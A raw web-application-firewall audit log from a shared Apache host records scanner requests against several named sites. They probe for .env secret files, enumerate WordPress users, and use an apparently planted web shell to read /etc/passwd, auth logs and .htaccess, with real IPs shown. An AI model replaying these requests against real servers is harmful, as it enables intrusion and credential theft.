www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Android 4.4.2; Tablet; rv:57.0) Gecko/57.0 Firefox/57.0 --ae73bd09-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ae73bd09-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/twilio/.env"] [unique_id "aE3EO23GPR2TokqXa4ELUAAAAAA"] Stopwatch: 1749926971585695 3768 (- - -) Stopwatch2: 1749926971585695 3768; combined=2147, p1=495, p2=1585, p3=0, p4=0, p5=67, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ae73bd09-Z-- --dc447059-A-- [15/Jun/2025:00:19:32.188836 +0530] aE3EPOblMrvfPBGDB2xDQgAAAAg 78.153.140.218 54384 127.0.0.1 7080 --dc447059-B-- GET /.env.save HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; en-gb; GT-P5110 Build/JRO03C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 --dc447059-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --dc447059-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.save"] [unique_id "aE3EPOblMrvfPBGDB2xDQgAAAAg"] Stopwatch: 1749926972185901 2999 (- - -) Stopwatch2: 1749926972185901 2999; combined=1702, p1=421, p2=1227, p3=0, p4=0, p5=54, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dc447059-Z-- --e0f8d206-A-- [15/Jun/2025:00:19:34.759153 +0530] aE3EPvgQcZu6vRSfy052PgAAAAI 78.153.140.218 54420 127.0.0.1 7080 --e0f8d206-B-- GET /config/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 4.0) Opera 7.23 [de] --e0f8d206-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e0f8d206-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/config/.env"] [unique_id "aE3EPvgQcZu6vRSfy052PgAAAAI"] Stopwatch: 1749926974756391 2814 (- - -) Stopwatch2: 1749926974756391 2814; combined=1562, p1=353, p2=1156, p3=0, p4=0, p5=53, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e0f8d206-Z-- --d68a297c-A-- [15/Jun/2025:00:19:36.359666 +0530] aE3EQAQYZLZu4P5jJ0ijHQAAAAo 78.153.140.218 54450 127.0.0.1 7080 --d68a297c-B-- GET /stage/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:49.0) Gecko/20100101 Firefox/49.0 --d68a297c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d68a297c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/stage/.env"] [unique_id "aE3EQAQYZLZu4P5jJ0ijHQAAAAo"] Stopwatch: 1749926976356778 2940 (- - -) Stopwatch2: 1749926976356778 2940; combined=1641, p1=405, p2=1184, p3=0, p4=0, p5=52, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d68a297c-Z-- --5f48f12c-A-- [15/Jun/2025:00:19:50.469275 +0530] aE3ETbXIppi-TUGr1MJ_hgAAAAU 85.204.70.100 52790 127.0.0.1 7081 --5f48f12c-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.retaxis.com X-Real-IP: 85.204.70.100 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=ce816144493bc64203123e95921aa8c11749926987 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --5f48f12c-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.retaxis.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Vary: Origin,Accept-Encoding Connection: close Content-Type: application/json; charset=UTF-8 --5f48f12c-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.retaxis.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE3ETbXIppi-TUGr1MJ_hgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749926989345607 1123801 (- - -) Stopwatch2: 1749926989345607 1123801; combined=2057, p1=336, p2=1603, p3=0, p4=0, p5=117, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5f48f12c-Z-- --ea964229-A-- [15/Jun/2025:00:26:39.715287 +0530] aE3F54QvQ5lW-c5YySCk4QAAAAc 44.197.76.210 46050 127.0.0.1 7081 --ea964229-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/networks HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.197.76.210 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --ea964229-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2984 Connection: close Content-Type: text/html; charset=UTF-8 --ea964229-H-- Message: Warning. Matched phrase "etc/networks" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/networks found within ARGS:viewfile: /etc/networks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/networks" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/networks found within ARGS:viewfile: /etc/networks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3F54QvQ5lW-c5YySCk4QAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749927399711179 4160 (- - -) Stopwatch2: 1749927399711179 4160; combined=1972, p1=351, p2=1506, p3=35, p4=26, p5=54, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ea964229-Z-- --1e0cf541-A-- [15/Jun/2025:00:26:51.688760 +0530] aE3F87XIppi-TUGr1MKALQAAAAU 34.236.185.101 59748 127.0.0.1 7081 --1e0cf541-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/passwd- HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.236.185.101 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --1e0cf541-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4965 Connection: close Content-Type: text/html; charset=UTF-8 --1e0cf541-H-- Message: Warning. Matched phrase "etc/passwd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/passwd found within ARGS:viewfile: /etc/passwd-"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/passwd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/passwd found within ARGS:viewfile: /etc/passwd-"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3F87XIppi-TUGr1MKALQAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749927411684302 4511 (- - -) Stopwatch2: 1749927411684302 4511; combined=2066, p1=330, p2=1593, p3=35, p4=28, p5=80, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1e0cf541-Z-- --39a33542-A-- [15/Jun/2025:00:28:56.081488 +0530] aE3GcPgQcZu6vRSfy053KQAAAAI 34.194.95.99 54362 127.0.0.1 7081 --39a33542-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=/var/www/vhosts/sarainternational.ae/httpdocs/admin/images/subproduct&viewfile=/var/www/vhosts/sarainternational.ae/httpdocs/admin/images/subproduct/.htaccess HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.194.95.99 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --39a33542-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3036 Connection: close Content-Type: text/html; charset=UTF-8 --39a33542-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c%20bipas.phtml"] [unique_id "aE3GcPgQcZu6vRSfy053KQAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1749927536077048 4492 (- - -) Stopwatch2: 1749927536077048 4492; combined=2083, p1=366, p2=1590, p3=36, p4=28, p5=63, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --39a33542-Z-- --6e1e8246-A-- [15/Jun/2025:00:31:09.577556 +0530] aE3G9LXIppi-TUGr1MKAngAAAAU 85.204.70.102 35382 127.0.0.1 7081 --6e1e8246-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 85.204.70.102 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --6e1e8246-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin,Accept-Encoding Connection: close Content-Type: application/json; charset=UTF-8 --6e1e8246-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.tandonamit.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE3G9LXIppi-TUGr1MKAngAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749927668107433 1470214 (- - -) Stopwatch2: 1749927668107433 1470214; combined=1909, p1=330, p2=1486, p3=0, p4=0, p5=93, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6e1e8246-Z-- --9a817706-A-- [15/Jun/2025:00:44:01.362866 +0530] aE3J-W3GPR2TokqXa4ENvQAAAAA 3.226.34.98 60762 127.0.0.1 7081 --9a817706-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/aliases.db HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.226.34.98 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --9a817706-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3219 Connection: close Content-Type: text/html; charset=UTF-8 --9a817706-H-- Message: Warning. Matched phrase "etc/alias" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/alias found within ARGS:viewfile: /etc/aliases.db"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/alias" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/alias found within ARGS:viewfile: /etc/aliases.db"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3J-W3GPR2TokqXa4ENvQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749928441358099 4820 (- - -) Stopwatch2: 1749928441358099 4820; combined=2332, p1=359, p2=1850, p3=37, p4=28, p5=58, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9a817706-Z-- --4f530d13-A-- [15/Jun/2025:00:46:28.791836 +0530] aE3KjOl677BAsJIfoYvu_AAAAAc 3.212.219.113 58048 127.0.0.1 7081 --4f530d13-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=/var/log&viewfile=/var/log/auth.log.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.212.219.113 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --4f530d13-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2948 Connection: close Content-Type: text/html; charset=UTF-8 --4f530d13-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3KjOl677BAsJIfoYvu_AAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749928588787774 4123 (- - -) Stopwatch2: 1749928588787774 4123; combined=2211, p1=344, p2=1737, p3=37, p4=34, p5=59, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4f530d13-Z-- --aba28a10-A-- [15/Jun/2025:00:51:27.200729 +0530] aE3LtgQYZLZu4P5jJ0imFwAAAAo 185.177.72.144 41556 127.0.0.1 7081 --aba28a10-B-- GET /.env HTTP/1.0 Host: l.thecreatorpreneur.in X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --aba28a10-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://l.thecreatorpreneur.in/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --aba28a10-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "l.thecreatorpreneur.in"] [uri "/.env"] [unique_id "aE3LtgQYZLZu4P5jJ0imFwAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/l.thecreatorpreneur.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749928886524118 676681 (- - -) Stopwatch2: 1749928886524118 676681; combined=1723, p1=407, p2=1205, p3=0, p4=0, p5=111, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aba28a10-Z-- --a0929d5a-A-- [15/Jun/2025:00:51:28.088650 +0530] aE3Lt42hmA9stZaN__JozQAAAAM 185.177.72.144 41580 127.0.0.1 7081 --a0929d5a-B-- GET /.env.bak HTTP/1.0 Host: l.thecreatorpreneur.in X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a0929d5a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://l.thecreatorpreneur.in/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --a0929d5a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||l.thecreatorpreneur.in|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "l.thecreatorpreneur.in"] [uri "/.env.bak"] [unique_id "aE3Lt42hmA9stZaN__JozQAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||l.thecreatorpreneur.in|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "l.thecreatorpreneur.in"] [uri "/.env.bak"] [unique_id "aE3Lt42hmA9stZaN__JozQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/l.thecreatorpreneur.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749928887428306 660428 (- - -) Stopwatch2: 1749928887428306 660428; combined=2119, p1=414, p2=1546, p3=0, p4=0, p5=158, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a0929d5a-Z-- --ac98d471-A-- [15/Jun/2025:00:51:28.971596 +0530] aE3LuPgQcZu6vRSfy055NgAAAAI 185.177.72.144 41604 127.0.0.1 7081 --ac98d471-B-- GET /.env.example HTTP/1.0 Host: l.thecreatorpreneur.in X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ac98d471-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://l.thecreatorpreneur.in/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --ac98d471-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "l.thecreatorpreneur.in"] [uri "/.env.example"] [unique_id "aE3LuPgQcZu6vRSfy055NgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/l.thecreatorpreneur.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749928888305962 665695 (- - -) Stopwatch2: 1749928888305962 665695; combined=2013, p1=378, p2=1528, p3=0, p4=0, p5=107, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ac98d471-Z-- --1078c92b-A-- [15/Jun/2025:00:51:29.846657 +0530] aE3LuQJRo2m7zz_kJHfxqAAAAAk 185.177.72.144 41628 127.0.0.1 7081 --1078c92b-B-- GET /.env.local HTTP/1.0 Host: l.thecreatorpreneur.in X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: 